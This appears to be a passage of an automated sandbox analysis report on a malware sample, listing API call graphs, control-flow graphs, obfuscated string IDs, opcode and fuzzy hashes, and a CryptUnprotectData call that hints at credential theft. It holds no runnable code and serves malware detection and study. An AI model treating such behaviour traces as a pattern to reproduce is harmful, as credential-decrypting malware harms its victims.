API calls 44593->44596 44594 3940030f 44594->44584 44595->44594 44596->44594 44599 39401bd0 44597->44599 44598 39401c31 44602 39401c2f 44598->44602 44645 39401854 44598->44645 44599->44598 44601 39401c21 44599->44601 44601->44602 44620 39409e44 44601->44620 44626 39401d58 44601->44626 44635 39409d78 44601->44635 44640 39409d68 44601->44640 44610 39401bfd 44607->44610 44608 39401c31 44609 39401854 CallWindowProcW 44608->44609 44611 39401c2f 44608->44611 44609->44611 44610->44608 44612 39401c21 44610->44612 44612->44611 44613 39409e44 CallWindowProcW 44612->44613 44614 39409d68 CallWindowProcW 44612->44614 44615 39409d78 CallWindowProcW 44612->44615 44616 39401d58 2 API calls 44612->44616 44613->44611 44614->44611 44615->44611 44616->44611 44618 39400856 44617->44618 44619 39400938 6 API calls 44617->44619 44618->44590 44619->44618 44621 39409e02 44620->44621 44622 39409e52 44620->44622 44649 39409e30 44621->44649 44652 39409e21 44621->44652 44623 39409e18 44623->44602 44627 39401d93 44626->44627 44628 39401d66 44626->44628 44627->44628 44629 39401d98 44627->44629 44631 39401854 CallWindowProcW 44628->44631 44634 39401d6e 44628->44634 44630 39401874 GetCurrentThreadId 44629->44630 44632 39401da4 44630->44632 44633 39401dac 44631->44633 44632->44602 44633->44602 44634->44602 44637 39409d8c 44635->44637 44636 39409e18 44636->44602 44638 39409e30 CallWindowProcW 44637->44638 44639 39409e21 CallWindowProcW 44637->44639 44638->44636 44639->44636 44642 39409d8c 44640->44642 44641 39409e18 44641->44602 44643 39409e30 CallWindowProcW 44642->44643 44644 39409e21 CallWindowProcW 44642->44644 44643->44641 44644->44641 44646 3940185f 44645->44646 44647 39401e5a CallWindowProcW 44646->44647 44648 39401e09 44646->44648 44647->44648 44648->44602 44650 39409e41 44649->44650 44655 3940aff0 44649->44655 44650->44623 44653 3940aff0 CallWindowProcW 44652->44653 44654 39409e41 44652->44654 44653->44654 44654->44623 44656 39401854 CallWindowProcW 44655->44656 44657 3940b00a 44656->44657 44657->44650 44570 38edce60 44571 38edce7c 44570->44571 44574 38ed9544 44571->44574 44573 38edce9b 44575 38ed954f 44574->44575 44576 38edcf4f 44575->44576 44578 38edd370 44575->44578 44576->44573 44581 38edd39e 44578->44581 44579 38edd429 44580 38ed962c 2 API calls 44580->44579 44581->44579 44581->44580

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 349 114328-114368 351 11436a 349->351 352 11436f-11444c call 113168 call 112c88 349->352 351->352 362 114453-114471 352->362 363 11444e 352->363 393 114474 call 114620 362->393 394 114474 call 114612 362->394 363->362 364 11447a-114485 365 114487 364->365 366 11448c-114490 364->366 365->366 367 114492-114493 366->367 368 114495-11449c 366->368 369 1144b4-1144f8 367->369 370 1144a3-1144b1 368->370 371 11449e 368->371 375 11455e-114575 369->375 370->369 371->370 377 114577-11459c 375->377 378 1144fa-114510 375->378 384 1145b4 377->384 385 11459e-1145b3 377->385 381 114512-11451e 378->381 382 11453a 378->382 386 114520-114526 381->386 387 114528-11452e 381->387 388 114540-11455d 382->388 385->384 389 114538 386->389 387->389 388->375 389->388 393->364 394->364
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                              • API String ID: 0-1229222154
                                                                                                              • Opcode ID: 2f441ac80e110ed556f57d57751fd389ba8f984d6708cbdd77cceebd767a5807
                                                                                                              • Instruction ID: 6238e6c56c829a09e6dfbb641ac8418f90de59896c66ee26410c74abcef98cfc
                                                                                                              • Opcode Fuzzy Hash: 2f441ac80e110ed556f57d57751fd389ba8f984d6708cbdd77cceebd767a5807
                                                                                                              • Instruction Fuzzy Hash: 8E91C274E002188FDB58CFA9D884A9DBBF2BF89300F14C069E819AB365DB349981CF50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 418 115f90-115fc6 546 115fc8 call 115f90 418->546 547 115fc8 call 1160e0 418->547 548 115fc8 call 115968 418->548 549 115fc8 call 1160d8 418->549 419 115fce-115fd4 420 116024-116028 419->420 421 115fd6-115fda 419->421 424 11602a-116039 420->424 425 11603f-116053 420->425 422 115fe9-115ff0 421->422 423 115fdc-115fe1 421->423 429 1160c6-116103 422->429 430 115ff6-115ffd 422->430 423->422 426 116065-11606f 424->426 427 11603b-11603d 424->427 428 11605b-116062 425->428 542 116055 call 118d90 425->542 543 116055 call 119048 425->543 544 116055 call 1190a8 425->544 431 116071-116077 426->431 432 116079-11607d 426->432 427->428 439 116105-11610b 429->439 440 11610e-11612e 429->440 430->420 433 115fff-116003 430->433 434 116085-1160bf 431->434 432->434 438 11607f 432->438 436 116012-116019 433->436 437 116005-11600a 433->437 434->429 436->429 441 11601f-116022 436->441 437->436 438->434 439->440 446 116130 440->446 447 116135-11613c 440->447 441->428 449 1164c4-1164cd 446->449 450 11613e-116149 447->450 451 1164d5-1164e2 450->451 452 11614f-116162 450->452 457 116164-116172 452->457 458 116178-116193 452->458 457->458 461 11644c-116453 457->461 462 116195-11619b 458->462 463 1161b7-1161ba 458->463 461->449 466 116455-116457 461->466 464 1161a4-1161a7 462->464 465 11619d 462->465 467 1161c0-1161c3 463->467 468 116314-11631a 463->468 471 1161da-1161e0 464->471 472 1161a9-1161ac 464->472 465->464 465->468 470 116406-116409 465->470 465->471 473 116466-11646c 466->473 474 116459-11645e 466->474 467->468 469 1161c9-1161cf 467->469 468->470 475 116320-116325 468->475 469->468 476 1161d5 469->476 477 1164d0 470->477 478 11640f-116415 470->478 479 1161e2-1161e4 471->479 480 1161e6-1161e8 471->480 481 1161b2 472->481 482 116246-11624c 472->482 473->451 483 11646e-116473 473->483 474->473 475->470 476->470 477->451 487 116417-11641f 478->487 488 11643a-11643e 478->488 489 1161f2-1161fb 479->489 480->489 481->470 482->470 486 116252-116258 482->486 484 116475-11647a 483->484 485 1164b8-1164bb 483->485 484->477 490 11647c 484->490 485->477 497 1164bd-1164c2 485->497 491 11625a-11625c 486->491 492 11625e-116260 486->492 487->451 493 116425-116434 487->493 488->461 496 116440-116446 488->496 494 1161fd-116208 489->494 495 11620e-116236 489->495 498 116483-116488 490->498 499 11626a-116281 491->499 492->499 493->458 493->488 494->470 494->495 517 11632a-116360 495->517 518 11623c-116241 495->518 496->450 496->461 497->449 497->466 500 1164aa-1164ac 498->500 501 11648a-11648c 498->501 510 116283-11629c 499->510 511 1162ac-1162d3 499->511 500->477 508 1164ae-1164b1 500->508 505 11649b-1164a1 501->505 506 11648e-116493 501->506 505->451 509 1164a3-1164a8 505->509 506->505 508->485 509->500 513 11647e-116481 509->513 510->517 523 1162a2-1162a7 510->523 511->477 522 1162d9-1162dc 511->522 513->477 513->498 524 116362-116366 517->524 525 11636d-116375 517->525 518->517 522->477 526 1162e2-11630b 522->526 523->517 527 116385-116389 524->527 528 116368-11636b 524->528 525->477 529 11637b-116380 525->529 526->517 541 11630d-116312 526->541 530 1163a8-1163ac 527->530 531 11638b-116391 527->531 528->525 528->527 529->470 534 1163b6-1163d5 call 1166b8 530->534 535 1163ae-1163b4 530->535 531->530 533 116393-11639b 531->533 533->477 536 1163a1-1163a6 533->536 538 1163db-1163df 534->538 535->534 535->538 536->470 538->470 539 1163e1-1163fd 538->539 539->470 541->517 542->428 543->428 544->428 546->419 547->419 548->419 549->419
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$(o]q$,aq$,aq
                                                                                                              • API String ID: 0-1947289240
                                                                                                              • Opcode ID: ec63fcbcda16f115043bfdd26441ae7e02690d9e2b29ef37ad3e11d9868bd296
                                                                                                              • Instruction ID: d5640df59e191c5e7f267db343246c7fbe558d2b80dfde12e2969ff7776cd905
                                                                                                              • Opcode Fuzzy Hash: ec63fcbcda16f115043bfdd26441ae7e02690d9e2b29ef37ad3e11d9868bd296
                                                                                                              • Instruction Fuzzy Hash: F8023F30A00219DFCB18CF69C984AEEBBF6FF98314F558069E815A7265D736DD81CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$4']q
                                                                                                              • API String ID: 0-176817397
                                                                                                              • Opcode ID: ec214e4f71a6c68700bfe1950b9de839edd413e1e51412aca4a0c13ce46e16fc
                                                                                                              • Instruction ID: fc773136b49d64765a16e26005a5180b8d5a9e648919925b45ae2414fba6637a
                                                                                                              • Opcode Fuzzy Hash: ec214e4f71a6c68700bfe1950b9de839edd413e1e51412aca4a0c13ce46e16fc
                                                                                                              • Instruction Fuzzy Hash: 10825D70A04209DFCB19CF68D9A4AEEBBF2FF88310F158569E4259B261D730ED85CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$Haq
                                                                                                              • API String ID: 0-903699183
                                                                                                              • Opcode ID: 9094311902022859c3367c0f8af73ba6a9c7d5cf46e3e975c8fd7ca46c404eea
                                                                                                              • Instruction ID: 34c20dbddcf34bc213733871c70dabec27f6caf17f4ea6d6e138675bf3727112
                                                                                                              • Opcode Fuzzy Hash: 9094311902022859c3367c0f8af73ba6a9c7d5cf46e3e975c8fd7ca46c404eea
                                                                                                              • Instruction Fuzzy Hash: 23128E70A00619CFCB18DF69D854AAEBBF6BFC8300F108569E545DB395EB349D82CB91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310887101.0000000039400000.00000040.00000800.00020000.00000000.sdmp, Offset: 39400000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_39400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te]q
                                                                                                              • API String ID: 0-52440209
                                                                                                              • Opcode ID: 236c17c923d16c4ee2b6bab0a0625b312db7db8c95d643785a7bd929d6303998
                                                                                                              • Instruction ID: b8eb6b246d3a14846433a296f46d2a7722a518b5d52484ff9e06c1a9e97942bb
                                                                                                              • Opcode Fuzzy Hash: 236c17c923d16c4ee2b6bab0a0625b312db7db8c95d643785a7bd929d6303998
                                                                                                              • Instruction Fuzzy Hash: 3E82D274A41228CFDB64DF64C995BADBBB2FF89300F1085A9D80967365CB359E82CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te]q
                                                                                                              • API String ID: 0-52440209
                                                                                                              • Opcode ID: 0392935b8ba254a232491e00a3b4017e1c12f385480fde31e4f684a723a7dbaf
                                                                                                              • Instruction ID: 6bc04cfa816ff8d8454898d41ad0e67f0b352f9ea8b7d8d5b661cfa543b7461f
                                                                                                              • Opcode Fuzzy Hash: 0392935b8ba254a232491e00a3b4017e1c12f385480fde31e4f684a723a7dbaf
                                                                                                              • Instruction Fuzzy Hash: 7172F374A41228CFDB64DF64C955BADBBB2FF89300F1084A9D809A7364CB359E86CF50
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(000000EC,?,00000000,?,?,?,?), ref: 3838DA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 21a22ab05c44db03777e4b059b0f379a8393364cbb73fbc7b4431c86fa99e530
                                                                                                              • Instruction ID: 1cd37fb53246c9203fa52407bb403cd6e419f2674343425716bc77a634b7ee5a
                                                                                                              • Opcode Fuzzy Hash: 21a22ab05c44db03777e4b059b0f379a8393364cbb73fbc7b4431c86fa99e530
                                                                                                              • Instruction Fuzzy Hash: B61137B6800249DFCB10CF9AC945BEEBFF5EF48320F14841AE958A7210C339A594DFA5
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(000000EC,?,00000000,?,?,?,?), ref: 3838DA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 145222eb797e9b493c4eedd4a52428a8b6de2886fe40c567eff301bfcae866c4
                                                                                                              • Instruction ID: 9dc17189fe7f3c5cc15196fe247b21d1b78480b5e0044cfe5416ca6be84aef98
                                                                                                              • Opcode Fuzzy Hash: 145222eb797e9b493c4eedd4a52428a8b6de2886fe40c567eff301bfcae866c4
                                                                                                              • Instruction Fuzzy Hash: 6A1114B6800249DFDB10DF99C945BEEBBF4EB48320F14841AE618A7210C779A994DFA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^98
                                                                                                              • API String ID: 0-2446004515
                                                                                                              • Opcode ID: 58519380f0d4e02cac1a0cd23d105843448fc05ffac3262dbebac199ff94f9ee
                                                                                                              • Instruction ID: 6042531179c03e21ab3c822b0dadbf7acc9a679867406485b5c68090a4c0c3c3
                                                                                                              • Opcode Fuzzy Hash: 58519380f0d4e02cac1a0cd23d105843448fc05ffac3262dbebac199ff94f9ee
                                                                                                              • Instruction Fuzzy Hash: DFA190B5E01228CFEB14CF6AC944B9DBBF2AF89300F14C1AAD409B7255DB355A89CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^98
                                                                                                              • API String ID: 0-2446004515
                                                                                                              • Opcode ID: 0f4ee1072b6f02124bc802ef49230936faa426225d9cc9d4fba2008c844db066
                                                                                                              • Instruction ID: 20692f8574fe2f28dc4330d74a2c24daf5ed4af88f1d3a0e205c07624c5133a3
                                                                                                              • Opcode Fuzzy Hash: 0f4ee1072b6f02124bc802ef49230936faa426225d9cc9d4fba2008c844db066
                                                                                                              • Instruction Fuzzy Hash: 25A191B5E01228CFEB14DF6AC944B9DBBF2AF89300F14C1AAD408A7255DB745A89CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^98
                                                                                                              • API String ID: 0-2446004515
                                                                                                              • Opcode ID: f54eb6a5fdeb89f6a33ca7124c341c8623ea5ab302ecac2c4645dd1c350edaf8
                                                                                                              • Instruction ID: 15caf10aa73f5f477ace10d3bbbaea16eecd129b0f4ebfc2f53f16cef98faa7e
                                                                                                              • Opcode Fuzzy Hash: f54eb6a5fdeb89f6a33ca7124c341c8623ea5ab302ecac2c4645dd1c350edaf8
                                                                                                              • Instruction Fuzzy Hash: 12A191B5E01628CFEB14CF6AC944B9DBBF2AF89300F14C1AAD409B7255DB345A86CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^98
                                                                                                              • API String ID: 0-2446004515
                                                                                                              • Opcode ID: 46a5b6b50fd3a414eee7e31e14137f7a7fe5bdd6ef6dd41ce8ff8145b4a0e236
                                                                                                              • Instruction ID: a78e35f61da99ae5a4c9b2d10a08a5e80a77cd49972125c48d0dbe72539eb339
                                                                                                              • Opcode Fuzzy Hash: 46a5b6b50fd3a414eee7e31e14137f7a7fe5bdd6ef6dd41ce8ff8145b4a0e236
                                                                                                              • Instruction Fuzzy Hash: 6BA191B5E01228CFEB54DF6AC944B9DBBF2AF89300F14C1AAD408B7255DB345A89CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^98
                                                                                                              • API String ID: 0-2446004515
                                                                                                              • Opcode ID: 2920d760133d53a8fe9daea76368d4b81072159a220f4e60c7644fb6d0845ee9
                                                                                                              • Instruction ID: 0ebf379bc65b04734c07312970f4e4e63c96e31846bfeff10d75d5e97583e6b3
                                                                                                              • Opcode Fuzzy Hash: 2920d760133d53a8fe9daea76368d4b81072159a220f4e60c7644fb6d0845ee9
                                                                                                              • Instruction Fuzzy Hash: D0819475E01658CFEB28CF6AC944B9DBBF2AF89200F14C1EAD40DA7255DB344A86CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^98
                                                                                                              • API String ID: 0-2446004515
                                                                                                              • Opcode ID: d1fbbcba386748ba0f7c531b1acdf034e6c7868b18ddcf4969476dec204492b8
                                                                                                              • Instruction ID: 8de859d4606fe6fbe5257845c03e5353a8b816e252f45d0ef4135156dd1c6f5b
                                                                                                              • Opcode Fuzzy Hash: d1fbbcba386748ba0f7c531b1acdf034e6c7868b18ddcf4969476dec204492b8
                                                                                                              • Instruction Fuzzy Hash: D77195B5E01618CFEB58CF6AC944B9DBBF2AF89300F14C1AAD40CA7255DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 04a5b44cdf0849f28a7165dc5ff2bcbfaefcd6cff70f25d18df212d33779a5df
                                                                                                              • Instruction ID: 5cd645394510cfe5b091d79cb65a88faf38dff5b6e694e0df5e5f744dd155e1b
                                                                                                              • Opcode Fuzzy Hash: 04a5b44cdf0849f28a7165dc5ff2bcbfaefcd6cff70f25d18df212d33779a5df
                                                                                                              • Instruction Fuzzy Hash: 7D72BE75E01228CFDB64DF69C980BD9BBB2BB49305F5095E9D408A7361DB349E8ACF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76e58b9082df69097777a7dd730f354dd801fe1a6039f8ae1d7868ad754b4c1e
                                                                                                              • Instruction ID: bfba9c15ca1c3b91d49496fb5a76feefe4646e10e768da1ec450e42f64a361cd
                                                                                                              • Opcode Fuzzy Hash: 76e58b9082df69097777a7dd730f354dd801fe1a6039f8ae1d7868ad754b4c1e
                                                                                                              • Instruction Fuzzy Hash: 7DE1CF74E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D809B7391DB755A86CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 474b6f7f20032bd50e730b019360d0c2d5e1933ac51f7ffa06a74b224ac3928f
                                                                                                              • Instruction ID: 987d5f33a188d1512da2962f48ad1914614e6450711bca628e5b4478aa2dc8c7
                                                                                                              • Opcode Fuzzy Hash: 474b6f7f20032bd50e730b019360d0c2d5e1933ac51f7ffa06a74b224ac3928f
                                                                                                              • Instruction Fuzzy Hash: 30D1BD74E01318CFDB54DFA5D994B9DBBB2BF89300F2081A9D809AB365DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c4dff302e7870801211b75b8f38796326a65844c1f5f2f077ee673aa44476de3
                                                                                                              • Instruction ID: da95dd518b0c9dacfd783c4cfec5d2c916e3f55b9614f28f383bec89e55811a2
                                                                                                              • Opcode Fuzzy Hash: c4dff302e7870801211b75b8f38796326a65844c1f5f2f077ee673aa44476de3
                                                                                                              • Instruction Fuzzy Hash: 2AA1E374D002088FDB14DFA9C994BDDBBB1FF89304F209269E408AB3A1DB749A85CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1eed6793a569b8f9310875ee720c61d5d0716d93ee9c14cc54ecec5c5774a49
                                                                                                              • Instruction ID: adf47fd6ba27e26dc75581bdc873300ef0ab2aa2b26935409751e3d1868f731f
                                                                                                              • Opcode Fuzzy Hash: f1eed6793a569b8f9310875ee720c61d5d0716d93ee9c14cc54ecec5c5774a49
                                                                                                              • Instruction Fuzzy Hash: 5AA1E374D002088FDB14DFA9D994BDDBBB1FF88314F209269E408AB3A1DB749A85CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c589e849b2119adaade6dda7c54f3af1ea1cd99595c0dc67f4c1e31e81d4403c
                                                                                                              • Instruction ID: cc34e3f398638118a14eb27c9f3df1ba7510eec1b733b95af24fdccf7e69e4c5
                                                                                                              • Opcode Fuzzy Hash: c589e849b2119adaade6dda7c54f3af1ea1cd99595c0dc67f4c1e31e81d4403c
                                                                                                              • Instruction Fuzzy Hash: 9B91E074900208CFEB10DFA8D994BDDBBB1BF49315F209269E409AB3A1DB749A85CF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6963b3d88cd8b383caeef550d445a56112a1539f9f6bbfbbfd568c8fda424794
                                                                                                              • Instruction ID: 12a8b158ffca2a28ffe1a3cea8a3340ff0bbfad31f6d7bdfacb9ce8bcfaddc4b
                                                                                                              • Opcode Fuzzy Hash: 6963b3d88cd8b383caeef550d445a56112a1539f9f6bbfbbfd568c8fda424794
                                                                                                              • Instruction Fuzzy Hash: 7E81E375E01608CFDB14DFA9C9906DDBBF2BF88300F64C529D814AB399EB35994ACB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a8b104d5277f8f15ce2fd357735c68ace9273f380a3e9baf0793a3b69954d97
                                                                                                              • Instruction ID: 76cb7694a7a53334ad2819467f15f80f43dc02736aeff9f0d219a8025c044679
                                                                                                              • Opcode Fuzzy Hash: 8a8b104d5277f8f15ce2fd357735c68ace9273f380a3e9baf0793a3b69954d97
                                                                                                              • Instruction Fuzzy Hash: 2481F475E01648CFDB08DFA9C9906DDBBF2BF88300F24C529D814AB359EB349946CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf6be9453de9cbf6ca36980422ede8e3879ea6cb6aa4805da6185120cec9fea3
                                                                                                              • Instruction ID: 8bbe0475a6aef1341ce0bff3f07ba8e9eec0fd04aba8cc794652a72fe5a41c44
                                                                                                              • Opcode Fuzzy Hash: cf6be9453de9cbf6ca36980422ede8e3879ea6cb6aa4805da6185120cec9fea3
                                                                                                              • Instruction Fuzzy Hash: 0771B575E01628CFDB64DF66C9847DDBBF2BF89301F1491AAD408A7260DB349A86CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: add09db688fba2660b62c98e6c1abfbf0d4dbb663e4a38e0906f87e33a99a70f
                                                                                                              • Instruction ID: edacae152d0a6169b37d5074f6240b3794670aa3aee00b5826cb99cacf440f10
                                                                                                              • Opcode Fuzzy Hash: add09db688fba2660b62c98e6c1abfbf0d4dbb663e4a38e0906f87e33a99a70f
                                                                                                              • Instruction Fuzzy Hash: B0615974A40258CFDB15DF64C945BADBBB6FF88300F1088AA980A77365CB395D86DF14
                                                                                                              Memory Dump Source
